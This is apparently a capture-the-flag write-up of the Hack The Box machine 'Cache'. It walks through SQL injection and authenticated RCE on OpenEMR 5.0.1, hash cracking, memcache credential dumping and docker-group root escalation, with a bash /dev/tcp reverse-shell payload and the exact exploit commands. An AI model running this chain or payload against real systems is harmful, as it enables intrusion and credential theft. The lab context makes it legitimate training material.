Result of nmap scan:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA) | 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA) |_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Cache Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Heading to the IP address in the browser reveals a website looking static and old. The login page however references an unusually named script
/jquery/functionality.js. Opening it reveals the only working credentials in the login form is
ash:[email protected]_fun. But the page behind it is under construction with a nice picture of Ace from One Piece.
Further exploration in the Author page shows:
ASH is a Security Researcher (Threat Research Labs), Security Engineer. Hacker, Penetration Tester and Security blogger. He is Editor-in-Chief, Author & Creator of Cache. Check out his other projects like Cache:
HMS(Hospital Management System)
So if we are exploring
cache.htb and it says that there is HMS which is like cache so can it be a
Add that to the
/etc/hosts file and we got a login page. It seems apparently it’s a CMS called OpenEMR. When facing a CMS, I don’t directly go for gobuster since their structure can be found directly where the CMS is available like Github and you can even find listed vulnerabilities.
OpenEMR on Github but the
robots.txt does not mention the version. Their is a
admin.php in the root folder and
http://hms.htb/admin.php reveals the version used is 5.0.1 (3). Still from Github, switch to
the appropriate tag from that version in order to see the source code which is deployed at HMS.
Now for vulnerability hunting, searchsploit reveals a RCE for our version but we need to get authenticated. A Google search ended with a
PDF containing a ton of vulnerabilites. Follow the instructions necessary to make a SQL injection with the
catid GET parameter of
/portal/find_appt_popup_user.php. To speed the exfiltration of the users, you will find at the repo the
database schema and the target table is called
Successful SQLMap exploitation gives the credentials
openemr_admin:$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. This being a Bcrypt hash, pass it to john or hashcat and it will come as being
xxxxxx (what a dumb password for an admin, lol).
Now we are authenticated, time to use the exploit we found with searchsploit.
$ searchsploit -m php/webapps/45161.py $ mv 45161.py openemr_rce.py # Listen to a port with netcat in another shell $ python openemr_rce.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/<tun0_ip>/<port> 0>&1'
And you have a shell !
The user flag is owned and readable only by ash but we do have a password for ash found in the cache JS script. Let’s try that:
$ python3 -c 'import pty; pty.spawn("/bin/bash")' # Spawn TTY shell $ su ash $ password: [email protected]_fun $ id uid=1000(ash) gid=1000(ash) groups=1000(ash)
Ash can’t sudo in the box so we used the famous
linpeas script to check for possible things we can exploit.
In the process list, I spotted
memcache 1098 0.0 0.1 425792 4052 ? Ssl 13:30 0:00 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1 -P /var/run/memcached/memc ached.pid
Memcache is running at 11211, so let’s try to see what informations it can give us.
[email protected]:~$ telnet localhost 11211 Trying ::1... Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. stats items . . . stats cachedump 1 100 ITEM link [21 b; 0 s] ITEM user [5 b; 0 s] ITEM passwd [9 b; 0 s] ITEM file [7 b; 0 s] ITEM account [9 b; 0 s] END get passwd VALUE passwd 0 9 0n3_p1ec3 END
And we got
0n3_p1ec3 ! That is sure to be the password of user
luffy (I’m a BIG fan of One Piece by the way).
Now lateral movement is done and luffy can’t sudo too, let’s use again linpeas. The first ouputs reveal luffy is a member of the docker group.
User & Groups: uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
This means we can run docker commands like deploy containers. The Privilege escalation became clear. We need to deploy an interactive container and mount the host filesystem as a volume in the container and like we will be root in the container, we will be root of the mounted volume which is the current box. Let’s first check if there is any image in the box we can use for that because if not, we will have to set a docker repository from our machine, host a useful image in it and make the box pull it.
[email protected]:~$ docker image ls REPOSITORY TAG IMAGE ID CREATED SIZE ubuntu latest 2ca708c1c9cc 8 months ago 64.2MB [email protected]:~$ docker run --rm -it -v /:/mnt ubuntu chroot /mnt #
Congratulations, you just rooted the box.